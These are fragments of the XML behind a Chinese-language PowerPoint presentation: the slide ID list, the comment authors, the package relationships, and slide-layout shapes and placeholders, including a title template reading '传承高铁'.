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320" r:id="rId3"/>
    <p:sldId id="1031" r:id="rId4"/>
    <p:sldId id="809" r:id="rId6"/>
    <p:sldId id="810" r:id="rId7"/>
    <p:sldId id="811" r:id="rId8"/>
    <p:sldId id="812" r:id="rId9"/>
    <p:sldId id="831" r:id="rId10"/>
    <p:sldId id="832" r:id="rId11"/>
    <p:sldId id="833" r:id="rId12"/>
    <p:sldId id="834" r:id="rId13"/>
    <p:sldId id="835" r:id="rId14"/>
    <p:sldId id="836" r:id="rId15"/>
    <p:sldId id="855" r:id="rId16"/>
    <p:sldId id="857" r:id="rId17"/>
    <p:sldId id="856" r:id="rId18"/>
    <p:sldId id="858" r:id="rId19"/>
    <p:sldId id="859" r:id="rId20"/>
    <p:sldId id="860" r:id="rId21"/>
    <p:sldId id="863" r:id="rId22"/>
    <p:sldId id="862" r:id="rId23"/>
    <p:sldId id="864" r:id="rId24"/>
    <p:sldId id="865" r:id="rId25"/>
    <p:sldId id="866" r:id="rId26"/>
    <p:sldId id="867" r:id="rId27"/>
    <p:sldId id="868" r:id="rId28"/>
    <p:sldId id="870" r:id="rId29"/>
    <p:sldId id="871" r:id="rId30"/>
    <p:sldId id="872" r:id="rId31"/>
    <p:sldId id="873" r:id="rId32"/>
    <p:sldId id="793" r:id="rId33"/>
    <p:sldId id="874" r:id="rId34"/>
    <p:sldId id="875" r:id="rId35"/>
    <p:sldId id="876" r:id="rId36"/>
    <p:sldId id="877" r:id="rId37"/>
    <p:sldId id="878" r:id="rId38"/>
    <p:sldId id="879" r:id="rId39"/>
    <p:sldId id="880" r:id="rId40"/>
    <p:sldId id="881" r:id="rId41"/>
    <p:sldId id="882" r:id="rId42"/>
    <p:sldId id="883" r:id="rId43"/>
    <p:sldId id="884" r:id="rId44"/>
    <p:sldId id="885" r:id="rId45"/>
    <p:sldId id="886" r:id="rId46"/>
    <p:sldId id="887" r:id="rId47"/>
    <p:sldId id="888" r:id="rId48"/>
    <p:sldId id="889" r:id="rId49"/>
    <p:sldId id="890" r:id="rId50"/>
    <p:sldId id="891" r:id="rId51"/>
    <p:sldId id="892" r:id="rId52"/>
    <p:sldId id="893" r:id="rId53"/>
    <p:sldId id="894" r:id="rId54"/>
    <p:sldId id="895" r:id="rId55"/>
    <p:sldId id="896" r:id="rId56"/>
    <p:sldId id="897" r:id="rId57"/>
    <p:sldId id="898" r:id="rId58"/>
    <p:sldId id="899" r:id="rId59"/>
    <p:sldId id="900" r:id="rId60"/>
    <p:sldId id="901" r:id="rId61"/>
    <p:sldId id="902" r:id="rId62"/>
    <p:sldId id="903" r:id="rId63"/>
    <p:sldId id="904" r:id="rId64"/>
    <p:sldId id="905" r:id="rId65"/>
    <p:sldId id="907" r:id="rId66"/>
    <p:sldId id="909" r:id="rId67"/>
    <p:sldId id="910" r:id="rId68"/>
    <p:sldId id="911" r:id="rId69"/>
    <p:sldId id="914" r:id="rId70"/>
    <p:sldId id="915" r:id="rId71"/>
    <p:sldId id="916" r:id="rId72"/>
    <p:sldId id="917" r:id="rId73"/>
    <p:sldId id="919" r:id="rId74"/>
    <p:sldId id="920" r:id="rId75"/>
    <p:sldId id="921" r:id="rId76"/>
    <p:sldId id="935" r:id="rId77"/>
    <p:sldId id="925" r:id="rId78"/>
    <p:sldId id="926" r:id="rId79"/>
    <p:sldId id="927" r:id="rId80"/>
    <p:sldId id="934" r:id="rId81"/>
    <p:sldId id="928" r:id="rId82"/>
    <p:sldId id="929" r:id="rId83"/>
    <p:sldId id="937" r:id="rId84"/>
    <p:sldId id="930" r:id="rId85"/>
    <p:sldId id="931" r:id="rId86"/>
    <p:sldId id="932" r:id="rId87"/>
    <p:sldId id="922" r:id="rId88"/>
    <p:sldId id="923" r:id="rId89"/>
    <p:sldId id="924" r:id="rId90"/>
    <p:sldId id="938" r:id="rId91"/>
    <p:sldId id="939" r:id="rId92"/>
    <p:sldId id="940" r:id="rId93"/>
    <p:sldId id="941" r:id="rId94"/>
    <p:sldId id="942" r:id="rId95"/>
    <p:sldId id="943" r:id="rId96"/>
    <p:sldId id="944" r:id="rId97"/>
    <p:sldId id="945" r:id="rId98"/>
    <p:sldId id="946" r:id="rId99"/>
    <p:sldId id="947" r:id="rId100"/>
    <p:sldId id="949" r:id="rId101"/>
    <p:sldId id="950" r:id="rId102"/>
    <p:sldId id="794" r:id="rId103"/>
    <p:sldId id="795" r:id="rId104"/>
    <p:sldId id="796" r:id="rId105"/>
    <p:sldId id="797" r:id="rId106"/>
    <p:sldId id="951" r:id="rId107"/>
    <p:sldId id="952" r:id="rId108"/>
    <p:sldId id="798" r:id="rId109"/>
    <p:sldId id="953" r:id="rId110"/>
    <p:sldId id="954" r:id="rId111"/>
    <p:sldId id="967" r:id="rId112"/>
    <p:sldId id="968" r:id="rId113"/>
    <p:sldId id="969" r:id="rId114"/>
    <p:sldId id="970" r:id="rId115"/>
    <p:sldId id="971" r:id="rId116"/>
    <p:sldId id="972" r:id="rId117"/>
    <p:sldId id="977" r:id="rId118"/>
    <p:sldId id="973" r:id="rId119"/>
    <p:sldId id="974" r:id="rId120"/>
    <p:sldId id="978" r:id="rId121"/>
    <p:sldId id="975" r:id="rId122"/>
    <p:sldId id="976" r:id="rId123"/>
    <p:sldId id="979" r:id="rId124"/>
    <p:sldId id="980" r:id="rId125"/>
    <p:sldId id="981" r:id="rId126"/>
    <p:sldId id="982" r:id="rId127"/>
    <p:sldId id="983" r:id="rId128"/>
    <p:sldId id="984" r:id="rId129"/>
    <p:sldId id="985" r:id="rId130"/>
    <p:sldId id="986" r:id="rId131"/>
    <p:sldId id="987" r:id="rId132"/>
    <p:sldId id="988" r:id="rId133"/>
    <p:sldId id="989" r:id="rId134"/>
    <p:sldId id="990" r:id="rId135"/>
    <p:sldId id="999" r:id="rId136"/>
    <p:sldId id="991" r:id="rId137"/>
    <p:sldId id="992" r:id="rId138"/>
    <p:sldId id="993" r:id="rId139"/>
    <p:sldId id="994" r:id="rId140"/>
    <p:sldId id="995" r:id="rId141"/>
    <p:sldId id="996" r:id="rId142"/>
    <p:sldId id="997" r:id="rId143"/>
    <p:sldId id="998" r:id="rId144"/>
    <p:sldId id="1000" r:id="rId145"/>
    <p:sldId id="1001" r:id="rId146"/>
    <p:sldId id="1002" r:id="rId147"/>
    <p:sldId id="1003" r:id="rId148"/>
    <p:sldId id="1004" r:id="rId149"/>
    <p:sldId id="1005" r:id="rId150"/>
    <p:sldId id="1006" r:id="rId151"/>
    <p:sldId id="1007" r:id="rId152"/>
    <p:sldId id="1008" r:id="rId153"/>
    <p:sldId id="1009" r:id="rId154"/>
    <p:sldId id="1010" r:id="rId155"/>
    <p:sldId id="1011" r:id="rId156"/>
    <p:sldId id="1012" r:id="rId157"/>
    <p:sldId id="1013" r:id="rId158"/>
    <p:sldId id="1014" r:id="rId159"/>
    <p:sldId id="1015" r:id="rId160"/>
    <p:sldId id="1016" r:id="rId161"/>
    <p:sldId id="1017" r:id="rId162"/>
    <p:sldId id="1018" r:id="rId163"/>
    <p:sldId id="1019" r:id="rId164"/>
    <p:sldId id="1020" r:id="rId165"/>
    <p:sldId id="1021" r:id="rId166"/>
    <p:sldId id="318" r:id="rId167"/>
  </p:sldIdLst>
  <p:sldSz cx="12192000" cy="6858000"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:custDataLst>
    <p:tags r:id="rId17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3" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="2" pos="386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熊仪_aYju7RJj" initials="熊" lastIdx="0" clrIdx="0"/>
  <p:cmAuthor id="1" name="哒哒 熊猫" initials="哒哒" lastIdx="1" clrIdx="0"/>
  <p:cmAuthor id="8" name="yifei" initials="y" lastIdx="1" clrIdx="7"/>
  <p:cmAuthor id="2" name="kingsoft" initials="k" lastIdx="1" clrIdx="1"/>
  <p:cmAuthor id="9" name="ADMIN" initials="A" lastIdx="1" clrIdx="8"/>
  <p:cmAuthor id="3" name="zhouzean" initials="z" lastIdx="1" clrIdx="2"/>
  <p:cmAuthor id="4" name="李鹏飞_6bQfzI3a" initials="李" lastIdx="0" clrIdx="0"/>
  <p:cmAuthor id="5" name="李晓菲_MZFnUzi6" initials="李" lastIdx="0" clrIdx="0"/>
  <p:cmAuthor id="6" name="小珞_QjMfU7FR" initials="小" lastIdx="0" clrIdx="0"/>
  <p:cmAuthor id="2001" name="骆倩怡_Znauj26B" initials="authorId_382814100"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083"/>
        <p:guide pos="386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2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="tags/tag43.xml"/><Relationship Id="rId171" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/commentAuthors" Target="commentAuthors.xml"/><Relationship Id="rId170" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tableStyles" Target="tableStyles.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide14.xml"/><Relationship Id="rId169" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/viewProps" Target="viewProps.xml"/><Relationship Id="rId168" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/presProps" Target="presProps.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6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag13.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.png"/><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PA_任意多边形 5"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1">
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="1381374"/>
            <a:ext cx="8105565" cy="4091077"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 1346 w 2540"/>
              <a:gd name="T1" fmla="*/ 1282 h 1282"/>
              <a:gd name="T2" fmla="*/ 0 w 2540"/>
              <a:gd name="T3" fmla="*/ 1282 h 1282"/>
              <a:gd name="T4" fmla="*/ 0 w 2540"/>
              <a:gd name="T5" fmla="*/ 0 h 1282"/>
              <a:gd name="T6" fmla="*/ 2540 w 2540"/>
              <a:gd name="T7" fmla="*/ 0 h 1282"/>
              <a:gd name="T8" fmla="*/ 1346 w 2540"/>
              <a:gd name="T9" fmla="*/ 1282 h 1282"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="T8" y="T9"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2540" h="1282">
                <a:moveTo>
                  <a:pt x="1346" y="1282"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1282"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2540" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1346" y="1282"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill dpi="0" rotWithShape="1">
            <a:blip r:embed="rId3"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect t="-25000" b="-10000"/>
            </a:stretch>
          </a:bli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1" name="PA_任意多边形 9"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1">
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>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任意多边形 13"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1">
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4839550" y="1373119"/>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任意多边形 17"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1">
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>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矩形 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1">
            <p:custDataLst>
              <p:tags r:id="rId7"/>
            </p:custDataLst>
          </p:nvPr>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PA_矩形 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1">
            <p:custDataLst>
              <p:tags r:id="rId8"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="816538"/>
            <a:ext cx="4531458"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矩形 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1">
            <p:custDataLst>
              <p:tags r:id="rId9"/>
            </p:custDataLst>
          </p:nvPr>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22"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1">
            <p:custDataLst>
              <p:tags r:id="rId10"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="5718171"/>
            <a:ext cx="4110224" cy="756308"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 1060 w 1288"/>
              <a:gd name="T1" fmla="*/ 237 h 237"/>
              <a:gd name="T2" fmla="*/ 0 w 1288"/>
              <a:gd name="T3" fmla="*/ 237 h 237"/>
              <a:gd name="T4" fmla="*/ 0 w 1288"/>
              <a:gd name="T5" fmla="*/ 0 h 237"/>
              <a:gd name="T6" fmla="*/ 1288 w 1288"/>
              <a:gd name="T7" fmla="*/ 0 h 237"/>
              <a:gd name="T8" fmla="*/ 1060 w 1288"/>
              <a:gd name="T9" fmla="*/ 237 h 237"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="T8" y="T9"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1288" h="237">
                <a:moveTo>
                  <a:pt x="1060" y="237"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1288" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1060" y="237"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="28" name="PA_直接连接符 27"/>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1">
            <p:custDataLst>
              <p:tags r:id="rId11"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6109853" y="45880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PA_文本框 28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1">
            <p:custDataLst>
              <p:tags r:id="rId12"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9852872" y="480485"/>
            <a:ext cx="1808480" cy="58356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传承高铁</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PA_文本框 29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1">
            <p:custDataLst>
              <p:tags r:id="rId13"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8146701" y="4650680"/>
            <a:ext cx="3262432" cy="400110"/>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PA_文本框 28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1">
            <p:custDataLst>
              <p:tags r:id="rId14"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="697597" y="5804871"/>
            <a:ext cx="1808480" cy="5835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38" name="Group 4"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="1"/>
          </p:cNvGrpSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="267335" y="211455"/>
            <a:ext cx="1409700" cy="479425"/>
            <a:chOff x="633" y="230"/>
            <a:chExt cx="1226" cy="417"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="39"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10" name="图片 9"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId15"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8231746" y="2042809"/>
            <a:ext cx="652329" cy="652329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="标题 11"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6534785" y="3102610"/>
            <a:ext cx="4888230" cy="577215"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:def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defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>单击此处编辑</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>标题</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="文本占位符 32"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7786370" y="3943985"/>
            <a:ext cx="3622675" cy="377825"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="90170" tIns="46990" rIns="90170" bIns="46990" rtlCol="0" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" marR="0" algn="r" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="2800" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>单击此处编辑</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>小标题</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="文本占位符 33"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7970520" y="5026660"/>
            <a:ext cx="3423920" cy="448310"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" marR="0" lvl="0" algn="r" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>单击</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>此处编辑</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>时间</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="灯片编号占位符 34"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{081D4568-8B36-48D6-98CF-39DF4C18A753}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="PA_文本框 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1">
            <p:custDataLst>
              <p:tags r:id="rId16"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9008555" y="1968679"/>
            <a:ext cx="2441694" cy="769441"/>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天机系列</a:t>
            </a:r>
            <a:endPar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8" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="1655892"/>
            <a:ext cx="12191999" cy="3546216"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId2">
              <a:extLst>
                <a:ext uri="{BEBA8EAE-BF5A-486C-A8C5-ECC9F3942E4B}">
                  <a14:imgProps xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                    <a14:imgLayer r:embed="rId3">
                      <a14:imgEffect>
                        <a14:artisticBlur/>
                      </a14:imgEffect>
                    </a14:imgLayer>
                  </a14:imgProps>
                </a:ext>
              </a:extLst>
            </a:blip>
            <a:stretch>
              <a:fillRect t="-6000" b="-5000"/>
            </a:stretch>
          </a:bli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Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="1655892"/>
            <a:ext cx="12191999" cy="3546216"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0162A7">
              <a:alpha val="35000"/>
            </a:srgb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 name="Freeform 6"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3752255" y="0"/>
            <a:ext cx="6847965" cy="6858000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 4180"/>
              <a:gd name="T1" fmla="*/ 0 h 4740"/>
              <a:gd name="T2" fmla="*/ 1674 w 4180"/>
              <a:gd name="T3" fmla="*/ 2337 h 4740"/>
              <a:gd name="T4" fmla="*/ 0 w 4180"/>
              <a:gd name="T5" fmla="*/ 4740 h 4740"/>
              <a:gd name="T6" fmla="*/ 2459 w 4180"/>
              <a:gd name="T7" fmla="*/ 4740 h 4740"/>
              <a:gd name="T8" fmla="*/ 4180 w 4180"/>
              <a:gd name="T9" fmla="*/ 2337 h 4740"/>
              <a:gd name="T10" fmla="*/ 2459 w 4180"/>
              <a:gd name="T11" fmla="*/ 0 h 4740"/>
              <a:gd name="T12" fmla="*/ 0 w 4180"/>
              <a:gd name="T13" fmla="*/ 0 h 4740"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="T8" y="T9"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="T10" y="T11"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="T12" y="T13"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4180" h="4740">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1674" y="2337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4740"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2459" y="4740"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4180" y="2337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2459" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>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Freeform 7"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8182135" y="0"/>
            <a:ext cx="3625490" cy="3381255"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2213 w 2213"/>
              <a:gd name="T1" fmla="*/ 2337 h 2337"/>
              <a:gd name="T2" fmla="*/ 1722 w 2213"/>
              <a:gd name="T3" fmla="*/ 2337 h 2337"/>
              <a:gd name="T4" fmla="*/ 0 w 2213"/>
              <a:gd name="T5" fmla="*/ 0 h 2337"/>
              <a:gd name="T6" fmla="*/ 492 w 2213"/>
              <a:gd name="T7" fmla="*/ 0 h 2337"/>
              <a:gd name="T8" fmla="*/ 2213 w 2213"/>
              <a:gd name="T9" fmla="*/ 2337 h 2337"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="T8" y="T9"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2213" h="2337">
                <a:moveTo>
                  <a:pt x="2213" y="2337"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1722" y="2337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="492" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2213" y="2337"/>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灯片编号占位符 15"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
